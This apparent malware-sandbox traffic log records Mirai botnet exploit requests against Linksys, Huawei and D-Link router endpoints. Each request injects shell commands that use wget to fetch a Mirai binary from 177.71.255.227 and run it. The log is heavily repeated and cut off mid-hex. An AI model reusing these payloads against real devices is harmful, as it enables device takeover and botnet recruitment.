Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 37 37 2e 37 31 2e 32 35 35 2e 32 32 37 2f 62 69 6e 73 2f 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2e 2f 6d 69 72 61 69 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://177.71.255.227/bins/mirai.mips; /bin/busybox chmod 777 * mirai.mips; ./mirai.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 37 37 2e 37 31 2e 32 35 35 2e 32 32 37 2f 62 69 6e 73 2f 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2e 2f 6d 69 72 61 69 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://177.71.255.227/bins/mirai.mips; /bin/busybox chmod 777 * mirai.mips; ./mirai.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 37 37 2e 37 31 2e 32 35 35 2e 32 32 37 2f 62 69 6e 73 2f 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2e 2f 6d 69 72 61 69 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://177.71.255.227/bins/mirai.mips; /bin/busybox chmod 777 * mirai.mips; ./mirai.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://177.71.255.227/bins/mirai.mips && chmod +x mirai.mips;./mirai.mips HNAP`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope> |
Source: global traffic | HTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://177.71.255.227/bins/mirai.mips && chmod +x mirai.mips;./mirai.mips HNAP`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope> |
Source: global traffic | HTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://177.71.255.227/bins/mirai.mips && chmod +x mirai.mips;./mirai.mips HNAP`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope> |
Source: global traffic | HTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://177.71.255.227/bins/mirai.mips && chmod +x mirai.mips;./mirai.mips HNAP`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope> |
Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 